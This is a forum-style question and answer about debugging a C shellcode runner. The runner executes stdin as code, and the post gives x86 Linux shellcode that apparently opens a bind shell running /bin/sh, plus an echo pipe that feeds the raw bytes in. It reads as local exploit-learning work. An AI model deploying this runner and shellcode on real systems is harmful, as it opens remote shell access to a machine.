I have a small c program on my local environment. This program receives a payload and outputs it.
#include <stdio.h>
#include <stdlib.h>
int main(int argc,char* argv[])
{
char buffer[1025];
memset(buffer,0,1025);
fread(buffer,1,1024,stdin);
int(*f)() = (int(*)())buffer;
f();
return 0;
}
I tried passing 1024 characters and then a shell code but it doesn't do anything.
I passed "A"x1204 and then the below shell written code
\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\x11\x5C\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80
Does anyone have any hint if I am doing it wrong.
stdin accepts ASCII text, not escaped C string. The buffer will contain then:
5c 78 36 61 5c 78 36 36 5c 78 35 38 5c 78 36 61 5c 78 30 31 5c 78 35 62 5c 78 39 39 5c 78 35 32 5c 78 35 33 5c 78 36 61 5c 78 30 32 5c 78 38 39 5c 78 65 31 5c 78 63 64 5c 78 38 30 5c 78 35 32 5c 78 34 33 5c 78 36 38 5c 78 66 66 5c 78 30 32 5c 78 31 31 5c 78 35 43 5c 78 38 39 5c 78 65 31 5c 78 36 61 5c 78 31 30 5c 78 35 31 5c 78 35 30 5c 78 38 39 5c 78 65 31 5c 78 38 39 5c 78 63 36 5c 78 62 30 5c 78 36 36 5c 78 63 64 5c 78 38 30 5c 78 34 33 5c 78 34 33 5c 78 62 30 5c 78 36 36 5c 78 63 64 5c 78 38 30 5c 78 35 32 5c 78 35 36 5c 78 38 39 5c 78 65 31 5c 78 34 33 5c 78 62 30 5c 78 36 36 5c 78 63 64 5c 78 38 30 5c 78 38 39 5c 78 64 39 5c 78 38 39 5c 78 63 33 5c 78 62 30 5c 78 33 66 5c 78 34 39 5c 78 63 64 5c 78 38 30 5c 78 34 31 5c 78 65 32 5c 78 66 38 5c 78 35 32 5c 78 36 38 5c 78 36 65 5c 78 32 66 5c 78 37 33 5c 78 36 38 5c 78 36 38 5c 78 32 66 5c 78 32 66 5c 78 36 32 5c 78 36 39 5c 78 38 39 5c 78 65 33 5c 78 35 32 5c 78 35 33 5c 78 38 39 5c 78 65 31 5c 78 62 30 5c 78 30 62 5c 78 63 64 5c 78 38 30
To pass an escaped string as a binary data echo can be used:
echo -n -e "\x6a\x66\x58\x6a\x01\x5b\x99" | a.out